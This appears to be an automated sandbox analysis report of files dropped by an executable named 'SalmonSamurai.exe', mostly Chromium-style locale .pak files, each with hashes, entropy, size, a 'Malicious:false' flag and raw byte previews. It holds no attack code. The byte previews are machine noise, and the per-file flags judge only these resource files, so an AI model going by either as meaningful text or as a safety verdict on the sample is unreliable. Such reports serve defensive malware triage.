                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\af.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):377708
                                                                                                                                                                                                                                              Entropy (8bit):5.4079285675542845
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                                                                                              MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                                                                                              SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
                                                                                                                                                                                                                                              SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                                                                                              SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........E...h.....i.....j.....k.....l.....n."...o.'...p.4...r.:...s.K...t.T...v.i...w.v...y.|...z.....|.....}.....................................................................................-.....>.....E.....N.....g.....p.....{...................................................../.....?.....K.....X.....y...........................................................<.....R.....W.....].....l.....y.....}.....................................................+.....9.....A.....I.....P.....U.....c.....s...............................................%.....J.....d.....m.....y...........................................................+.....2.....5.....6.....B.....L.....V.....].....g.............................O.....^.....k.................................................................".....5.....Q.....z....................................... .....".....%.....(.$...*.D...+.G...,.e........./.....0.....1.....3.....4.....5.....6.D...7.U...8.j...9.y...<.....=.....>.....?.....@.....A.....C.$...D.+.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\am.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):613642
                                                                                                                                                                                                                                              Entropy (8bit):4.894733266944232
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                                                                                              MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                                                                                              SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                                                                                              SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                                                                                              SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........W...h.....i.....j.'...k.6...l.A...n.I...o.N...p.[...r.a...s.r...t.{...v.....w.....y.....z.....|.....}.........................................................................7.....S.....i.........................................L.....k.....m.....q...................................1.....A.....`.............................".....4.....=.....\.....~...................................5.....Q.....W.....Z.....i.............................K.....z.....................................................8.....G.....`.............................".........................................>.....A.....s.............................@.....G.....J.....K.....W.....`.....|.......................<............................./.....g.....w...............................................3.......................E.....j.....p.....x..................... .....".....%.6...(.c...*.....+.....,.........../.....0.....1.]...3.y...4.....5.....6.K...7.s...8.....9.....;.....<.....=.....>.?...?.I...@.i...A.....C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ar.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):671738
                                                                                                                                                                                                                                              Entropy (8bit):4.903433286644294
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                                                                                              MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                                                                                              SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                                                                                              SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
                                                                                                                                                                                                                                              SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........*...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.!...v.6...w.C...y.I...z.X...|.^...}.p.....x.....}.................................................................'.....^.....n...................................'.....*...........V.....x.........................................G.....].....p...............................................o...................................................../.....Q.....s.......................(....._.....i.....q.....x.............................#.....:.....m.......................).....Z.....k.........................................$.....?.....U.....k...........................................................p.................7.....L.....h.......................!.....1.....9.....E.....g.......................&.....Z............................................. .'...".D...%.x...(.....*.....+.....,.6.....M.../.~...0.....1.....3.....4.....5.,...6.....7.....8.....9.....;.....<.:...=.P...>.....?.....@.....A.....C.....D.....E.!...F._.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\bg.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):701716
                                                                                                                                                                                                                                              Entropy (8bit):4.66095894344634
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                                                                                              MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                                                                                              SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                                                                                              SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                                                                                              SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........P...h.....i.....j.....k.%...l.0...n.8...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.........................................................................F.....h...............................................[.........................................#.....Q.....x...................................[.........................................T...............................................'.....U......................./.....c...............................................>.....s.............................4.....^................. .....9.....V.....l...................................\...............................................&.....B.....S.....v...............................................O.....r...................................0.......................9.....z.......................-.....[............... .....".....%.....(.E...*.q...+.t...,.........../.....0.....1.....3.....4.....5.....6.....7.....8.....9.....;.3...<.G...=._...>.....?.....@.....A.....C.F.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\bn.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):904943
                                                                                                                                                                                                                                              Entropy (8bit):4.273773274227575
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                                                                                              MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                                                                                              SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                                                                                              SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                                                                                              SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........K...h.....i.....j.....k.$...l./...n.7...o.=...p.J...r.P...s.a...t.j...v.....w.....y.....z.....|.....}.............................................................................................................7.....a.......................".....$.....(.....P.......................+.....T.....p.......................H...................................M.....c...........5.....D....._.........................................A.....z.................B.......................................................................H.....a.....s.........................................B.....g.............................3.....W.....{...............................................>...........j...................................6.....R.........................................g...........9.....u...........V...................................8... .M...".....%.....(. ...*.\...,._........./.....0.....1.`...3.....4.....5.....6.....7.....8.E...9.d...;.....<.....=.....>."...?.5...@.j...A.....C.3...D.S.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ca.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):426906
                                                                                                                                                                                                                                              Entropy (8bit):5.400864409916039
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:+XnGrijIs3cSlFEYLCJBB43nbhjJSwmrwiwWzM1ldLbpuQ16BtryBBwIle3nei3X:iNV4ossMNu51hnW5CptA
                                                                                                                                                                                                                                              MD5:D259469E94F2ADF54380195555154518
                                                                                                                                                                                                                                              SHA1:D69060BBE8E765CA4DC1F7D7C04C3C53C44B8AB5
                                                                                                                                                                                                                                              SHA-256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
                                                                                                                                                                                                                                              SHA-512:D0BD0201ACF4F7DAA84E89AA484A3DEC7B6A942C3115486716593213BE548657AD702EF2BC1D3D95A4A56B0F6E7C33D5375F41D6A863E4CE528F2BD6A318240E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........N...h.....i.....j.....k.!...l.,...n.4...o.9...p.F...r.L...s.]...t.f...v.{...w.....y.....z.....|.....}...............................................................................6.....O.....o.....|.....................................................2.....J.....j.....q...........................................................1.....;.....M.....].......................................................................D.....i.................................................................+.....2.....?.....u.........................................".....5.....F.....b.....e.....}.............................................................................&.....h......................./.....P.....s.....................................................4.....P.....|...............................................:.....F... .Q...".g...%.....(.....*.....+.....,.........../.-...0.2...1.h...3.x...4.....5.....6.....7.....8.....9.(...;.6...<.D...=.R...>.l...?.v...@.....A.....C.....D.....E...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\cs.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):436202
                                                                                                                                                                                                                                              Entropy (8bit):5.843819816549512
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:U4ftEfqE2jv7ShUjBA59wjd558YAGKND9Gto8QV:U41HE2jjShqywjd558YAbNDcI
                                                                                                                                                                                                                                              MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
                                                                                                                                                                                                                                              SHA1:2AFCDF4234A9644FB128B70182F5A3DF1EE05BE1
                                                                                                                                                                                                                                              SHA-256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
                                                                                                                                                                                                                                              SHA-512:3A8A409A3C34149A977DEA8A4CB0E0822281AED2B0A75B02479C95109D7D51F6FB2C2772CCF1486CA4296A0AC2212094098F5CE6A1265FA6A7EB941C0CFEF83E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:......../...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.(...v.=...w.J...y.P...z._...|.e...}.w.........................................................................................#.....,.....9.....V.....d.........................................!.....?.....L.....X.....d.....o.....................................................".....4.....E.....{.......................................................................8.....O.....d.....{.................................................................H.....Z.....h.....................................................9.....<.....J.....X.....h.....w.................................................................!.....p.......................".....>.....s.....................................................&.....N.....n.........................................+.....5... .=...".N...%.u...(.....*.....+.....,.........../.....0.....1.H...3.V...4.s...5.....6.....7.....8.....9.....<."...=.,...>.A...?.I...@.[...A.....C.....D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\da.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):396104
                                                                                                                                                                                                                                              Entropy (8bit):5.454826678090317
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:Q3rSn4RJ28687mlwlGXaJwZkqEb1Phv6VP5yarXGzOJixhd4/TWwS:eND/xqkqEO5nrFTq
                                                                                                                                                                                                                                              MD5:1A53D374B9C37F795A462AAC7A3F118F
                                                                                                                                                                                                                                              SHA1:154BE9CF05042ECED098A20FF52FA174798E1FEA
                                                                                                                                                                                                                                              SHA-256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
                                                                                                                                                                                                                                              SHA-512:395279C9246BD30A0E45D775D9F9C36353BD11D9463282661C2ABD876BDB53BE9C9B617BB0C2186592CD154E9353EA39E3FEED6B21A07B6850AB8ECD57E1ED29
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........[...h.....i.)...j.5...k.D...l.O...n.W...o.\...p.i...r.o...s.....t.....v.....w.....y.....z.....|.....}.........................................................................?.....M.....].....q.....y...........................................................4.....K.....R.....].....m.....t...........................................................5.....F.....u.............................................................................9.....T.....m.....w.....z................................................................./.....E.....k.............................................................................+.....2.....5.....6.....=.....F.....L.....S.....^.............................X.....n.......................................................................F.....[................................................... .....".....%.,...(.T...*.....+.....,.........../.....0.....1.....3.....4.%...5.=...6.o...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.%...C.B...D.L.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\de.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):424277
                                                                                                                                                                                                                                              Entropy (8bit):5.503137231857292
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:TFigju3qg4wajEzUKnYm31SOmhqYl51gHNiOIkCJD:TFiecqg1aqHSOu599kCJD
                                                                                                                                                                                                                                              MD5:8E6654B89ED4C1DC02E1E2D06764805A
                                                                                                                                                                                                                                              SHA1:FF660BC85BB4A0FA3B2637050D2B2D1AECC37AD8
                                                                                                                                                                                                                                              SHA-256:61CBCE9A31858DDF70CC9B0C05FB09CE7032BFB8368A77533521722465C57475
                                                                                                                                                                                                                                              SHA-512:5AC71EDA16F07F3F2B939891EDA2969C443440350FD88AB3A9B3180B8B1A3ECB11E79E752CF201F21B3DBFBA00BCC2E4F796F347E6137A165C081E86D970EE61
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............h.V...i.g...j.s...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.............#.....+.....3.....;.....B.....I.....P.....Q.....R.....T...........................................................$.....:.....<.....@.....h.....}.....................................................-.....Q.....d.....j.....s...............................................4.....K.....O.....R.....[.....t...................................D.....Q.....[.....c.....j.....p.....}...............................................0.....d.................................................................6.....O.....i.....p.....s.....t.....~...................................=...................................6.....?.....Q.....[.....h.....m.....r...................................(.....Y.....u.....{........................... .....".....%.....(.....*./...+.2...,.P.....a.../.w...0.....1.....3.....4.....5.....6.A...7.U...8.i...9.w...;.....<.....=.....>.....?.....@.....A.....C.....D.%.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\el.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):769050
                                                                                                                                                                                                                                              Entropy (8bit):4.75072843480339
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:H/58dBquNw2202pgtZSWjZ4LIbsJvaP5A3HKQiEQBR07391qf2utKMaBlS9WffFR:H8BquNw2202pgtsWjyLrJvaRA3HtiEQG
                                                                                                                                                                                                                                              MD5:9528D21E8A3F5BAD7CA273999012EBE8
                                                                                                                                                                                                                                              SHA1:58CD673CE472F3F2F961CF8B69B0C8B8C01D457C
                                                                                                                                                                                                                                              SHA-256:E79C1E7A47250D88581E8E3BAF78DCAF31FE660B74A1E015BE0F4BAFDFD63E12
                                                                                                                                                                                                                                              SHA-512:165822C49CE0BDB82F3C3221E6725DAC70F53CFDAD722407A508FA29605BC669FB5E5070F825F02D830E0487B28925644438305372A366A3D60B55DA039633D7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........M...h.....i.....j.....k.....l.(...n.0...o.5...p.B...r.H...s.Y...t.b...v.w...w.....y.....z.....|.....}.........................................................................P.....w.............................B.....N.....Z...................................+.....x...................................h.....y.............................&.....C.....a.................,.....4.....H.....o...................................!.....M.................8...............................................1....._.....w.................!.....2.....q.................J.....a.........................................,.....O.....|.........................................!.....3.....F.....^.......................,.................<.............................(.....;.....I.......................M.................T.................................../... .B...".e...%.....(.....*.7...+.:...,.X........./.....0.....1.m...3.....4.....5.#...6.....7.....8.....9. ...;.a...<.w...=.....>.....?.....@.....A.B...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\en-GB.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):344606
                                                                                                                                                                                                                                              Entropy (8bit):5.5169703217013675
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:80kjE55JcUnMP9egFXwqfaYnT9Xa5alSeBNdg:80kQJZnM1XwWT05YScg
                                                                                                                                                                                                                                              MD5:D59E613E8F17BDAFD00E0E31E1520D1F
                                                                                                                                                                                                                                              SHA1:529017D57C4EFED1D768AB52E5A2BC929FDFB97C
                                                                                                                                                                                                                                              SHA-256:90E585F101CF0BB77091A9A9A28812694CEE708421CE4908302BBD1BC24AC6FD
                                                                                                                                                                                                                                              SHA-512:29FF3D42E5D0229F3F17BC0ED6576C147D5C61CE2BD9A2E658A222B75D993230DE3CE35CA6B06F5AFA9EA44CFC67817A30A87F4FAF8DC3A5C883B6EE30F87210
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........h.h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.(...v.=...w.J...y.P...z._...|.e...}.w...........................................................................................................3.....;.....E.....c.....t.....v.....z...........................................................+.....:.....T.....g.....k.....q...................................................................................,.....:.....S.....h.....{.......................................................................+.....5.....A.....X.....h.................................................................(.....=.....R.....f.....m.....p.....q.....x..................................................... .....P.....].....h.......................................................................-.....D.....l....................................... .....".....%.....(.....*.....+.....,./.....@.../.N...0.W...1.....3.....4.....5.....6.....7.....8.....9.(...;.9...<.A...=.L...>.a...?.i...@.x...A...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\en-US.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):347111
                                                                                                                                                                                                                                              Entropy (8bit):5.508989875739037
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:xiLqIY2MuZYLMMP9ecGmM8faYdY4K55TiSbn8vMwS:xiLqIp34MM+mM0Y55eSKMwS
                                                                                                                                                                                                                                              MD5:5E3813E616A101E4A169B05F40879A62
                                                                                                                                                                                                                                              SHA1:615E4D94F69625DDA81DFAEC7F14E9EE320A2884
                                                                                                                                                                                                                                              SHA-256:4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687
                                                                                                                                                                                                                                              SHA-512:764A271A9CFB674CCE41EE7AED0AD75F640CE869EFD3C865D1B2D046C9638F4E8D9863A386EBA098F5DCEDD20EA98BAD8BCA158B68EB4BDD606D683F31227594
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........:.h.....i.....j.*...k.9...l.D...n.L...o.Q...p.^...r.d...s.u...t.~...v.....w.....y.....z.....|.....}.........................................................................6.....C.....R.....b.....i.....r.................................................................#...........>.....E.....Q.....l.....~.................................................................2.....:.....F.....S.....W.....Z.....`.....p...................................................................................:.....A.....P...........................................................'.....5.....H.....K.....\.....l.....|...................................................................................E.....m.....t.......................................................................0.....I.....m......................................................... .....".....%.3...(.J...*.c...+.f...,.........../.....0.....1.....3.....4.....5.....6.J...7.Z...8.o...9.|...;.....<.....=.....>.....?.....@.....A...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\es-419.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):421147
                                                                                                                                                                                                                                              Entropy (8bit):5.3798866108688905
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:34e5fql0vt1s9zjzVMY/6+yN9d8piKkGp2Ioiw/QbuOXV5blUB0GLF96RRIHKxgY:34e5Sktm92Yfhpjq+5wLF96oSdc4
                                                                                                                                                                                                                                              MD5:7F6696CC1E71F84D9EC24E9DC7BD6345
                                                                                                                                                                                                                                              SHA1:36C1C44404EE48FC742B79173F2C7699E1E0301F
                                                                                                                                                                                                                                              SHA-256:D1F17508F3A0106848C48A240D49A943130B14BD0FEB5ED7AE89605C7B7017D1
                                                                                                                                                                                                                                              SHA-512:B226F94F00978F87B7915004A13CDBD23DE2401A8AFAA2517498538967DF89B735F8ECC46870C92E3022CAC795218A60AD2B8FFF1EFAD9FEEA4EC193704A568A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........b...h.&...i./...j.;...k.J...l.U...n.]...o.b...p.o...r.u...s.....t.....v.....w.....y.....z.....|.....}.........................................................................B.....T.....c.....x.................................................................I.....c.....k.....y............................................... .....%.....-.....?.....c.....t...........................................................2.....M.....d...............................................#.....6.....E.....W.....o.....w.........................................B.....N.....a.....m...........................................................$.....'.....(.....1.....:.....C.....J.....[.................2.....:.........................................+.....6.....?.....D.....]...................................@.....Y....._.....g.....u............... .....".....%.....(.....*.....+.....,.<.....b.../.....0.....1.....3.....4.....5.....6.[...7.m...8.....9.....;.....<.....=.....>.....?.....@.....A.1...C.X...D.b.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\es.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):421332
                                                                                                                                                                                                                                              Entropy (8bit):5.349883254359391
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:fILAyMcQXU0+/3IgsC5pN+v6Idj3J5Orj7FQoz7L66PZqS:ALAyNQCsupUv6gj3J5OrmoznGS
                                                                                                                                                                                                                                              MD5:A36992D320A88002697DA97CD6A4F251
                                                                                                                                                                                                                                              SHA1:C1F88F391A40CCF2B8A7B5689320C63D6D42935F
                                                                                                                                                                                                                                              SHA-256:C5566B661675B613D69A507CBF98768BC6305B80E6893DC59651A4BE4263F39D
                                                                                                                                                                                                                                              SHA-512:9719709229A4E8F63247B3EFE004ECFEB5127F5A885234A5F78EE2B368F9E6C44EB68A071E26086E02AA0E61798B7E7B9311D35725D3409FFC0E740F3AA3B9B5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........Z...h.....i.....j.*...k.9...l.D...n.L...o.Q...p.^...r.d...s.u...t.~...v.....w.....y.....z.....|.....}.........................................................................:.....M.....].....r...........................................................(.....G.....a.....i.....w.....................................................!.....).....;.....N....._.................................................................3.....S.....}............................................... .....-.....>.....V.....^.....o...................................5.....@.....J.....V.....h.............................................................................'.....0.....7.....H.................3.....;.........................................+.....6.....B.....G....._.........................................G.....M.....U.....c............... .....".....%.....(.....*.....+.....,.).....C.../.]...0.d...1.....3.....4.....5.....6.6...7.G...8.\...9.n...;.....<.....=.....>.....?.....@.....A.....C.1...D.;.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\et.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):380687
                                                                                                                                                                                                                                              Entropy (8bit):5.464870724176939
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:2Mg++J/xRN0JLnrC4HFJbT/RauiQ/G5LjR43f7LQkPQW:2MmJnq7DG5LjQ
                                                                                                                                                                                                                                              MD5:A94E1775F91EA8622F82AE5AB5BA6765
                                                                                                                                                                                                                                              SHA1:FF17ACCDD83AC7FCC630E9141E9114DA7DE16FDB
                                                                                                                                                                                                                                              SHA-256:1606B94AEF97047863481928624214B7E0EC2F1E34EC48A117965B928E009163
                                                                                                                                                                                                                                              SHA-512:A2575D2BD50494310E8EF9C77D6C1749420DFBE17A91D724984DF025C47601976AF7D971ECAE988C99723D53F240E1A6B3B7650A17F3B845E3DAEEFAAF9FE9B9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........m...h.<...i.M...j.Y...k.h...l.s...n.{...o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}...............................!.....(...../.....6.....7.....8.....:.....l.....|...............................................,.....B.....D.....H.....p.................................................................5.....B.....H.....P.....^.....m.....v.......................................................................-.....F.....Z.....o.......................................................................0.....=.....W.....e.................................................................-.....B.....V.....m.....t.....w.....x...............................................U.....[...............................................$.....).....,.....<.....b.....x.........................................$.....6.....O.....Z... .d...".w...%.....(.....*.....+.....,....... .../.8...0.E...1.n...3.y...4.....5.....6.....7.....8.....9.+...;.>...<.K...=.T...>.g...?.o...@.~...A.....C.....D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\fa.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):622184
                                                                                                                                                                                                                                              Entropy (8bit):5.029655615738747
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:Kxw5iX9nuyaXTfwHxwNUWGOGfStQEvy1zeItDmNtua/1wMTAKzIxRAQiHedNu36/:Kxw5YuyaXTfwRwNUWGOGfStQEvy1zeIR
                                                                                                                                                                                                                                              MD5:9D273AF70EAFD1B5D41F157DBFB94FDC
                                                                                                                                                                                                                                              SHA1:DA98BDE34B59976D4514FF518BD977A713EA4F2E
                                                                                                                                                                                                                                              SHA-256:319D1E20150D4E3F496309BA82FCE850E91378EE4B0C7119A003A510B14F878B
                                                                                                                                                                                                                                              SHA-512:0A892071BEA92CC7F1A914654BC4F9DA6B9C08E3CB29BB41E9094F6120DDC7A08A257C0D2B475C98E7CDCF604830E582CF2A538CC184056207F196FFC43F29AD
                                                                                                                                                                                                                                              Malicious:false
